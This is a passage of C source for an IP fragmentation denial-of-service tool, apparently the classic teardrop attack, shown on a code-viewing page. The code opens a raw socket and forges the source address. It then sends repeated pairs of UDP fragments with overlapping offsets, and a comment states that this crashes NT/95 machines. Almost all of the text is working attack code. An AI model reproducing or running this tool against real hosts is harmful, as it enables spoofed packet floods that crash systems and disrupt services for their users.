📄 iphack.txt
字号:
perror("raw socket");exit(1);}if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))< 0){perror("IP_HDRINCL");exit(1);}if (argc < 3) usage(argv[0]);if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2]))){fprintf(stderr, "What the hell kind of IP address is that?\n");exit(1);}while ((i = getopt(argc, argv, "s:t:n:")) != EOF){switch (i){case 's': /* source port (should be emphemeral) */src_prt = (u_short)atoi(optarg);break;case 't': /* dest port (DNS, anyone?) */dst_prt = (u_short)atoi(optarg);break;case 'n': /* number to send */count = atoi(optarg);break;default :usage(argv[0]);break; /* NOTREACHED */}}srandom((unsigned)(time((time_t)0)));if (!src_prt) src_prt = (random() % 0xffff);if (!dst_prt) dst_prt = (random() % 0xffff);if (!count) count = COUNT;fprintf(stderr, "Death on flaxen wings:\n");addr.s_addr = src_ip;fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);addr.s_addr = dst_ip;fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt);fprintf(stderr, " Amt: %5d\n", count);fprintf(stderr, "[ ");for (i = 0; i < count; i++){send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);fprintf(stderr, "b00m ");usleep(500);}fprintf(stderr, "]\n");return (0);}/** Send two IP fragments with pathological offsets. We use an implementation* independent way of assembling network packets that does not rely on any of* the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).*/void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,u_short dst_prt){u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */u_char byte; /* a byte */struct sockaddr_in sin; /* socket protocol structure */sin.sin_family = AF_INET;sin.sin_port = src_prt;sin.sin_addr.s_addr = dst_ip;/** Grab some memory for our packet, align p_ptr to point at the beginning* of our packet, and then fill it with zeros.*/packet = (u_char *)malloc(IPH + UDPH + PADDING);p_ptr = packet;bzero((u_char *)p_ptr, IPH + UDPH + PADDING);byte = 0x45; /* IP version and header length */memcpy(p_ptr, &byte, sizeof(u_char));p_ptr += 2; /* IP TOS (skipped) */*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */p_ptr += 2;*((u_short *)p_ptr) = htons(242); /* IP id */p_ptr += 2;*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */p_ptr += 2;*((u_short *)p_ptr) = 0x40; /* IP TTL */byte = IPPROTO_UDP;memcpy(p_ptr + 1, &byte, sizeof(u_char));p_ptr += 4; /* IP checksum filled in by kernel */*((u_long *)p_ptr) = src_ip; /* IP source address */p_ptr += 4;*((u_long *)p_ptr) = dst_ip; /* IP destination address */p_ptr += 4;*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */p_ptr += 2;*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */p_ptr += 2;*((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,sizeof(struct sockaddr)) == -1){perror("\nsendto");free(packet);exit(1);}/* We set the fragment offset to be inside of the previous packet's* payload (it overlaps inside the previous packet) but do not include* enough payload to cover complete the datagram. Just the header will* do, but to crash NT/95 machines, a bit larger of packet seems to work* better.*/p_ptr = &packet[2]; /* IP total length is 2 bytes into the header */*((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);p_ptr += 4; /* IP offset is 6 bytes into the header */*((u_short *)p_ptr) = FIX(MAGIC);if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,sizeof(struct sockaddr)) == -1){perror("\nsendto");free(packet);exit(1);}free(packet);}u_long name_resolve(u_char *host_name){struct in_addr addr;struct hostent *host_ent;if ((addr.s_addr = inet_addr(host_name)) == -1){if (!(host_ent = gethostbyname(host_name))) return (0);bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);}return (addr.s_addr);}void usage(u_char *name){fprintf(stderr,"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",name);exit(0);}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -